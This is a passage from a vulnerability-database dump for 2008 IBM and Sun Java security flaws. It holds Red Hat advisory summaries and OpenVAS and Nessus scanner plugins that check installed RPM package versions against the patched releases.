"id": "OPENVAS:136141256231065489", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065489", "type": "openvas", "title": "SLES9: Security update for IBM Java5 JRE and SDK", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5041763.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for IBM Java5 JRE and SDK\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65489\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-5350\", \"CVE-2008-5346\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5359\", \"CVE-2008-5341\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5348\", \"CVE-2008-2086\", \"CVE-2008-5345\", \"CVE-2008-5351\", \"CVE-2008-5360\", \"CVE-2008-5353\", \"CVE-2008-5356\", \"CVE-2008-5354\", \"CVE-2008-5357\", \"CVE-2008-5352\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for IBM Java5 JRE and SDK\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"IBMJava5-JRE\", rpm:\"IBMJava5-JRE~1.5.0~0.57\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:46:34", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5351", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358"], "description": "The IBM(r) 1.6.0 Java(TM) release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,\nCVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2017-09-08T12:20:12", "published": "2009-03-25T04:00:00", "id": "RHSA-2009:0369", "href": "https://access.redhat.com/errata/RHSA-2009:0369", "type": "redhat", "title": "(RHSA-2009:0369) Critical: java-1.6.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:32:08", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360"], "description": "The Java Runtime Environment (JRE) contains the software and tools that\nusers need to run applets and applications written using the Java\nprogramming language. \n\nA vulnerability was found in in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute arbitrary\ncode. (CVE-2008-2086)\n\nAdditionally, these packages fix several other critical vulnerabilities.\nThese are summarized in the \"Advance notification of Security Updates for\nJava SE\" from Sun Microsystems.\n\nUsers of java-1.6.0-sun should upgrade to these updated packages, which\ncorrect these issues.", "modified": "2017-07-27T11:46:47", "published": "2008-12-04T05:00:00", "id": "RHSA-2008:1018", "href": "https://access.redhat.com/errata/RHSA-2008:1018", "type": "redhat", "title": "(RHSA-2008:1018) Critical: java-1.6.0-sun security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:31", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5359", "CVE-2008-5360"], "description": "The IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These are\nsummarized in the \"Security Alerts\" from IBM. \n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR9 Java release.", "modified": "2017-09-08T12:08:51", "published": "2009-01-13T05:00:00", "id": "RHSA-2009:0016", "href": "https://access.redhat.com/errata/RHSA-2009:0016", "type": "redhat", "title": "(RHSA-2009:0016) Critical: java-1.5.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:33:13", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5359", "CVE-2008-5360"], "description": "The Java Runtime Environment (JRE) contains the software and tools that\nusers need to run applets and applications written using the Java\nprogramming language. \n\nA vulnerability was found in in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute arbitrary\ncode. (CVE-2008-2086)\n\nAdditionally, these packages fix several other vulnerabilities. These are\nsummarized in the \"Advance notification of Security Updates for Java SE\"\nfrom Sun Microsystems. \n\nUsers of java-1.5.0-sun should upgrade to these updated packages, which\ncorrect these issues.", "modified": "2017-07-27T11:46:56", "published": "2008-12-04T05:00:00", "id": "RHSA-2008:1025", "href": "https://access.redhat.com/errata/RHSA-2008:1025", "type": "redhat", "title": "(RHSA-2008:1025) Critical: java-1.5.0-sun security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:09", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5348", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5359", "CVE-2008-5360"], "description": "The IBM(r) 1.4.2 SR13 Java(TM) release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2008-2086, CVE-2008-5339, CVE-2008-5340,\nCVE-2008-5342, CVE-2008-5343, CVE-2008-5344, CVE-2008-5345, CVE-2008-5346,\nCVE-2008-5348, CVE-2008-5350, CVE-2008-5351, CVE-2008-5353, CVE-2008-5354,\nCVE-2008-5359, CVE-2008-5360)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13 Java release. All running\ninstances of IBM Java must be restarted for the update to take effect.", "modified": "2018-05-26T04:26:19", "published": "2009-04-23T04:00:00", "id": "RHSA-2009:0445", "href": "https://access.redhat.com/errata/RHSA-2009:0445", "type": "redhat", "title": "(RHSA-2009:0445) Critical: java-1.4.2-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:09", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3103", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5359", "CVE-2008-5360"], "description": "This update corrects several security vulnerabilities in the IBM Java 2\nRuntime Environment and the IBM Java 2 Software Development Kit, shipped as\npart of Red Hat Network Satellite Server. In a typical operating\nenvironment, these are of low security risk as the runtime is not used on\nuntrusted applets.\n\nSeveral vulnerabilities were discovered in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2008-3103, CVE-2008-5345, CVE-2008-5346,\nCVE-2008-5348, CVE-2008-5349, CVE-2008-5350, CVE-2008-5351, CVE-2008-5352,\nCVE-2008-5353, CVE-2008-5354, CVE-2008-5356, CVE-2008-5357, CVE-2008-5359,\nCVE-2008-5360)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR9 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2016-04-04T18:36:43", "published": "2009-05-07T04:00:00", "id": "RHSA-2009:0466", "href": "https://access.redhat.com/errata/RHSA-2009:0466", "type": "redhat", "title": "(RHSA-2009:0466) Low: java-1.5.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-17T13:06:34", "description": "Updated java-1.6.0-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 4 Extras and Red Hat\nEnterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM(r) 1.6.0 Java(tm) release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2008-5340, CVE-2008-5341,\nCVE-2008-5342, CVE-2008-5343, CVE-2008-5351, CVE-2008-5356,\nCVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. All running\ninstances of IBM Java must be restarted for the update to take effect.", "edition": 29, "published": "2009-08-24T00:00:00", "title": "RHEL 4 / 5 : java-1.6.0-ibm (RHSA-2009:0369)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5343", "CVE-2008-5357", "CVE-2008-5356", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5351"], "modified": "2009-08-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-src", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-devel", "cpe:/o:redhat:enterprise_linux:5.3", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-jdbc", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-plugin", "cpe:/o:redhat:enterprise_linux:4.7", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-accessibility", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-javacomm"], "id": "REDHAT-RHSA-2009-0369.NASL", "href": "https://www.tenable.com/plugins/nessus/40739", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:0369. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40739);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5351\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\");\n script_bugtraq_id(32608, 32620, 32892);\n script_xref(name:\"RHSA\", value:\"2009:0369\");\n\n script_name(english:\"RHEL 4 / 5 : java-1.6.0-ibm (RHSA-2009:0369)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.6.0-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 4 Extras and Red Hat\nEnterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM(r) 1.6.0 Java(tm) release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2008-5340, CVE-2008-5341,\nCVE-2008-5342, CVE-2008-5343, CVE-2008-5351, CVE-2008-5356,\nCVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. All running\ninstances of IBM Java must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5341\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5358\"\n );\n # http://www.ibm.com/developerworks/java/jdk/alerts/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://developer.ibm.com/javasdk/support/security-vulnerabilities/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:0369\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119, 189, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-accessibility\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-javacomm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:0369\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.6.0-ibm-1.6.0.4-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.6.0-ibm-demo-1.6.0.4-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.6.0-ibm-devel-1.6.0.4-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.6.0-ibm-javacomm-1.6.0.4-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.6.0-ibm-javacomm-1.6.0.4-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.6.0-ibm-jdbc-1.6.0.4-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.6.0-ibm-plugin-1.6.0.4-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.6.0-ibm-src-1.6.0.4-1jpp.1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.6.0-ibm-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-ibm-accessibility-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"java-1.6.0-ibm-accessibility-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-ibm-accessibility-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.6.0-ibm-demo-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.6.0-ibm-devel-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-ibm-javacomm-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-ibm-javacomm-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.6.0-ibm-jdbc-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-ibm-plugin-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.6.0-ibm-src-1.6.0.4-1jpp.1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-ibm / java-1.6.0-ibm-accessibility / java-1.6.0-ibm-demo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:11:08", "description": "This update brings the IBM Java 6 JDK and JRE to Service Release 4. It\nfixes lots of bugs and various security issues :\n\n - A vulnerability in the Java Runtime Environment may\n allow an untrusted Java Web Start application to\n determine the location of the Java Web Start cache and\n the username of the user running the Java Web Start\n application. (CVE-2008-5341)\n\n - A vulnerability in the Java Runtime Environment with\n launching Java Web Start applications may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted application. (CVE-2008-5340)\n\n - The UTF-8 (Unicode Transformation Format-8) decoder in\n the Java Runtime Environment (JRE) accepts encodings\n that are longer than the 'shortest' form. This behavior\n is not a vulnerability in Java SE. However, it may be\n leveraged to exploit systems running software that\n relies on the JRE UTF-8 decoder to reject non-shortest\n form sequences. For example, non-shortest form sequences\n may be decoded into illegal URIs, which may then allow\n files that are not otherwise accessible to be read, if\n the URIs are not checked following UTF-8 decoding.\n (CVE-2008-5351)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5356)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5357)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing GIF images may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5358)\n\n - A security vulnerability in the the Java Web Start\n BasicService allows untrusted applications that are\n downloaded from another system to request local files to\n be displayed by the browser of the user running the\n untrusted application. (CVE-2008-5342)", "edition": 25, "published": "2009-09-24T00:00:00", "title": "SuSE 11 Security Update : IBM Java 1.6.0 (SAT Patch Number 736)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5357", "CVE-2008-5356", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5351"], "modified": "2009-09-24T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-plugin", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-fonts", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-jdbc", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-alsa"], "id": "SUSE_11_JAVA-1_6_0-IBM-090405.NASL", "href": "https://www.tenable.com/plugins/nessus/41405", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41405);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5351\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\");\n\n script_name(english:\"SuSE 11 Security Update : IBM Java 1.6.0 (SAT Patch Number 736)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings the IBM Java 6 JDK and JRE to Service Release 4. It\nfixes lots of bugs and various security issues :\n\n - A vulnerability in the Java Runtime Environment may\n allow an untrusted Java Web Start application to\n determine the location of the Java Web Start cache and\n the username of the user running the Java Web Start\n application. (CVE-2008-5341)\n\n - A vulnerability in the Java Runtime Environment with\n launching Java Web Start applications may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted application. (CVE-2008-5340)\n\n - The UTF-8 (Unicode Transformation Format-8) decoder in\n the Java Runtime Environment (JRE) accepts encodings\n that are longer than the 'shortest' form. This behavior\n is not a vulnerability in Java SE. However, it may be\n leveraged to exploit systems running software that\n relies on the JRE UTF-8 decoder to reject non-shortest\n form sequences. For example, non-shortest form 